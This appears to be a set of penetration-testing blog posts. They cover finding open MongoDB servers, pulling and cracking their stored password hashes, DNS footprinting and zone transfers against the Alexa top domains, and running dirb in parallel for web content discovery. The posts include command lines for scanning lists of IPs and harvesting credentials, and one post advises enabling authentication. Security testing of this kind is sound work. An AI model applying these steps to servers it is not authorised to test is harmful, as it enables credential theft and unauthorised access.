Finding and Exploiting MongoDB

MongoDB is a NoSQL database used to handle backend data for many web applications. Often, MongoDB is used to store configuration information, session information, and user profile information. By default the MongoDB does not require authentication for client access. This is not a problem if MongoDB is only listening on localhost but often it is not.

Finding MongoDB Servers

By default MongoDB listens on port 27017, which is not in the Nmap top 1000 port list or the /etc/services list used by Nessus. You will need to scan specifically for this service if you want to find it.

Although MongoDB does not have authentication enabled by default it can be enabled. Nessus, Metasploit , and Nmap have methods to identify MongoDB servers that are not using authentication.

Manual Interaction with MongoDB

The easiest way to interact with MongoDB is to use the Mongo CLI client, mongo. On Kali2 you can install the client by installing the mongodb-clients package with apt-get. After installing mongodb-clients you can connect to the MongoDB server using:

mongo [hostname]:[port]/[database_name]. 

The local database holds information about the server while the admin database holds any credentials stored on the server.

Once connected you can use the following commands to gather data from the server:

  • show databases – Shows all of the databases on the server.
  • use – Uses the specified database name
  • show collections – Shows a list of collections (similar to tables) in the database.
  • db.findOne() – Displays the first entry in the collection. All collection entries are JSON objects.
  • db.find() – Displays a list of entries in the collection.
  • it – Iterates through the list returned by find().

More information about using the mongo shell can be found here:

Scripted Interaction with MongoDB

One of the nice things about the mongo shell is we can write JavaScript files and have them executed on the server. So if there is a particular set of information you would like to find you can write a script to gather that data for you.

To run a script specify the script file on the as part of the mongo command to connect to the server:

mongo [hostname]:[port]/[database_name] [script_name]

Example Script to Gather Mongo Server Info

Download the access.js script run it against the “local” database on the MongoDB server. We need to specify the “local” database because that is where the startup_log collection is stored.

If you have a list of IP addresses that you want to gather information about, you can use a simple bash one-liner along with the access.js script to gather the data.

for i in $(ip_list); do echo $i; mongo $i/local access.js; done;

Example Script to Gather Mongo Credentials

In some cases the MongoDB server may be configured to allow users to access it both with credentials and anonymously. In this case it may be possible to access the server anonymously and gather the plaintext or hashed credentials from the admin database. The creds.js script will gather MONGODB-CR and SCRAM-SHA-1 hashes from the “admin” database on the MongoDB server if they exist.

As of April, 2016, oclHashcat could not crack either form of password hash. You can use the MongoDB password cracking scripts, which are available here and here to crack these passwords.

Fixing the Problem

MongoDB can be configured to require authentication for all user accounts and as of Mongo3.0 it supports a strong hashing algorithm, SCRAM-SHA-1. I highly recommend enabling authentication for all users and using the SCRAM-SHA-1 hashing algorithm with strong passphrases.

Cracking MongoDB Passwords

On a recent penetration test I came across a number of MongoDB servers that allowed unauthenticated access. Using this access, I was able to download the MongoDB user accounts and their associated password hashes. MongoDB uses two password hashing schemes. The first is called MONGODB-CR, which is a simple MD5 hash of the string username:mongo:password. This password hashing algorithm is no longer used and has been replaced by a much stronger password hashing algorithm based on SCRAM-SHA-1. When MongoDB introduced the SCRAM-SHA-1 algorithm they didn’t update the older user accounts to use the new hashing algorithm so you will still find servers that use the older MONGODB-CR format.

I wrote two scripts to crack these passwords. The first,, is a Python script for cracking MONGODB-CR passwords that is multithreaded and can process a large number of passwords quickly because MD5 password hashes are easily calculated. This script uses Python3 and the standard libraries. To use this script run ./ hashfile wordfile, where hashfile is file containing a list of colon (:) separated usernames and password hashes (one per line) and wordfile is a list of password candidates.

The second script, mongoscram.go, is written in Go, which worked much faster than Python for calculating the SCRAM-SHA-1 passwords. Since the SCRAM algorithm uses PBKDF2 with 10,000 iterations, cracking these passwords is compute intensive and takes a lot of time. The mongoscram.go script can test over 300 passwords per second for one user. To use the script you will need to install the latest version of the Go language and you will need to install the PBKDF2 library using go get You will also need to define the environment variable GOPATH (On Linux or Mac add export GOPATH=$HOME/go to your .bash_profile file.).

When running the mongoscram.go script you will need to provide the username, password_file, salt, and stored_key. The username, salt, and stored_key can be obtained from the MongoDB server. The password_file is the list of passwords you want to test.

As always, if you have any trouble running the scripts or getting them to work please let me know and I will be happy to help.

DNS Footprinting at Scale

Recently I wrote an article on doing domain footprinting. Shortly after that article a friend on Twitter mentioned that he was doing zone transfer research against the Alexa top 1 million web sites so I decided to try my hand at it as well. My work on that project eventually resulted in code, raw data, and some analysis, which can be found here:

Part of the analysis from the zone transfer research resulted in a huge list of subdomain names. I took the top 10,000 subdomains and used a modified version of the script to foot print the Alexa top 1000 domains.

The modified script,, that I used and the resulting dataset in tar.gz format are both available. The script only works on one domain at a time so I used the GNU parallel program to run 8 copies of the script in parallel. I can get through the top 1000 domains within a day. Most domains take anywhere from 2 -10 minutes depending on how fast their DNS servers respond.

To run the script in parallel use the following command:

parallel -a domain.list -j 8 ./dnsbrute {1} subdomain.list

Make sure you have Python3 installed and that the dnspython3, netaddr, and ipwhois libraries are installed.

DNS Footprinting

There are a lot of tools available for doing target footprinting, Spiderfoot, Maltego, and theHarvester to name a few. Unfortunately, I find something lacking in each of these tools. Spiderfoot and Maltego are too complicated for me. I really like the Unix philosophy of simple tools that do one thing well and both of these fall outside of that philosophy. TheHarvester fits much better into this philosophy but it also provides a lot of data I don’t want when doing network footprinting, like email addresses and shared hosts.

When I am trying to footprint a network I am often only given a domain name and I want to know DNS names and IP addresses associated with that domain name. In addition, I want to know about the network blocks those IP addresses belong to and other servers that may be in those network blocks. With that in mind I wrote the Python script.


The script takes a domain name and provides the SOA record, MX records, and NS records. It then attempts a zone transfer from each of the name servers and then brute forces DNS names using the provided word list. Next, it does a whois lookup to find Network blocks associated with any IP addresses found in the A and AAAA records. Finally, it performs a reverse lookup on all of the identified IP addresses and on the small network blocks.


The following Python3 libraries are needed. * dnspython3 * netaddr * ipwhois

Usage domain wordlist

You can find an example of the output here:

Update 2016-01-20:

There is now a multi-threaded version of the script, The usage is the same as

Web Content Discovery with Parallel

In my previous post I showed you how to do content discovery using a bash one-liner and the dirb program. This works great if you have 5-10 servers but if you have more than that you may need to run the bash command on multiple servers at the same time. This is where the parallel command can help.

If the parallel command is not installed on your Kali box, you can install it with apt-get install parallel.

Using the following command we can run dirb against 16 servers at once.

cat websites.txt | parallel -j 16 dirb {} -f -o websites.dirb

All of the stdout from all 16 jobs will be written to the websites.dirb file. Once the command is completed you can grep the websites.dirb file for any identified files. The command grep + websites.dirb should produce results similar to the following:

+ (CODE:302|SIZE:257)
+ (CODE:200|SIZE:3751)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:504|SIZE:0)
+ (CODE:504|SIZE:0)
+ (CODE:504|SIZE:0)
+ (CODE:504|SIZE:0)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:3)
+ (CODE:302|SIZE:1)